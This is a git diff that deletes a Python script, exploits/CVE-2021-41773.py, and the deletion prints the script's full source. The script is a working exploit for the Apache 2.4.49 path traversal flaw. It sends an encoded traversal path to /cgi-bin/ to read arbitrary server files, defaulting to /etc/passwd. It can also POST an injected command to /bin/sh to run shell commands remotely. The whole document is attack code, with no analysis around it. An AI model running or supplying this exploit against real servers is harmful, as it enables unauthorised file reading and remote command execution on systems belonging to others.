diff --git a/exploits/CVE-2021-41773.py b/exploits/CVE-2021-41773.py deleted file mode 100755 index 49dfd70..0000000 --- a/exploits/CVE-2021-41773.py +++ /dev/null @@ -1,42 +0,0 @@ -import argparse -import re -import urllib.request, urllib.parse - -def exploit(target_url, file_path, command): - if not re.match(r'^https?://', target_url): - target_url = f"https://{target_url}" - - if not file_path: - file_path = "/etc/passwd" - - payload = "/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e" - data = f"foo=|echo;{command}" - response = None - - if command: - payload += "/bin/sh" - req = urllib.request.Request(target_url + payload, data=data.encode(), method='POST') - response = urllib.request.urlopen(req) - if not command: - payload += file_path - response = urllib.request.urlopen(target_url + payload) - - print(response.read().decode("utf-8")) - -def main(): - parser = argparse.ArgumentParser(description="CVE-2021-41773 | Apache2 2.4.49 Exploit") - parser.add_argument("-t", "--target", help="Enter the URL of the domain you want to test", required=True) - parser.add_argument("-c", "--command", help="Enter the command you want to run") - parser.add_argument("-f", "--file", help="Enter the file you would like to read") - - args = parser.parse_args() - - try: - exploit(args.target, args.file, args.command) - except KeyboardInterrupt: - exit(1) - except EOFError: - exit(1) - -if __name__ == "__main__": - main()